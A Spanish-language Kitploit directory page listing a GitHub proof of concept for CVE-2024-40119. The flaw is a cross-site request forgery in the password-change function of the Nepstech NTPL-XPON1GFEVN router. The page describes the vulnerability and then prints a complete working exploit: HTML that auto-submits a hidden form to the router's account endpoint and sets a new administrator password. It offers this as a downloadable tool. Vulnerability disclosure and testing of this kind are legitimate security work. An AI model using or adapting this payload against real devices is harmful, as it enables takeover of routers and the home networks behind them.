Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
nepstech-xpon-router-CVE-2024-40119 — Vulnerabilidad de Cross-Site Request Forgery (CSRF) en la función de cambio de contraseña, que permite a atacantes remotos cambiar la contraseña de administrador sin el consentimiento del usuario, lo que conduce a una posible toma de control de la cuenta. | Kitploit
Herramientas/GitHubGitHub/baroi-ai/nepstech-xpon-router-cve-2024-40119
Seguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubbaroi-ai/nepstech-xpon-router-cve-2024-40119

nepstech-xpon-router-CVE-2024-40119

Vulnerabilidad de Cross-Site Request Forgery (CSRF) en la función de cambio de contraseña, que permite a atacantes remotos cambiar la contraseña de administrador sin el consentimiento del usuario, lo que conduce a una posible toma de control de la cuenta.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
114hace 2 añosAún no revisado

nepstech-xpon-router-CVE-2024-40119

Autor:

Subhodeep Baroi

CVE-2024-40119: Vulnerabilidad CSRF en el enrutador WiFi Nepstech NTPL-XPON1GFEVN v1.0

Descripción

CVE-2024-40119 es una vulnerabilidad de Cross-Site Request Forgery (CSRF) en el enrutador WiFi Nepstech xpon NTPL-XPON1GFEVN v1.0 con firmware v2.0.1. Esta vulnerabilidad permite a atacantes remotos cambiar la contraseña de administrador sin el consentimiento del usuario, lo que lleva a una posible toma de control de la cuenta.

Detalles

  • Tipo de Vulnerabilidad: Cross-Site Request Forgery (CSRF)
  • Fabricante del Producto: Nepstech
  • Base de Código del Producto Afectado: Enrutador WiFi xpon (terminal) - Modelo: NTPL-XPON1GFEVN - Versión: 1.0 y Firmware: V2.0.1
  • Componente Afectado: Funcionalidad de cambio de contraseña de la aplicación web del enrutador
  • Tipo de Ataque: Remoto
  • Impacto: Toma de Control de la Cuenta de Administrador

Vectores de Ataque

Un atacante remoto puede crear una página HTML maliciosa que active la funcionalidad de cambio de contraseña cuando un usuario autenticado la visite. A continuación se muestra un vector de ataque de ejemplo:

root@kitploit:~
<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
      <input type="hidden" name="name0" value="admin" />
      <input type="hidden" name="name1" value="user" />
      <input type="hidden" name="name2" value="user3" />
      <input type="hidden" name="oldUsername" value="admin" />
      <input type="hidden" name="newUsername" value="" />
      <input type="hidden" name="oldPassword" value="" />
      <input type="hidden" name="newPassword" value="UserUser2&#64;" />
      <input type="hidden" name="cfmPassword" value="UserUser2&#64;" />
      <input type="hidden" name="accountflg" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Descargar herramienta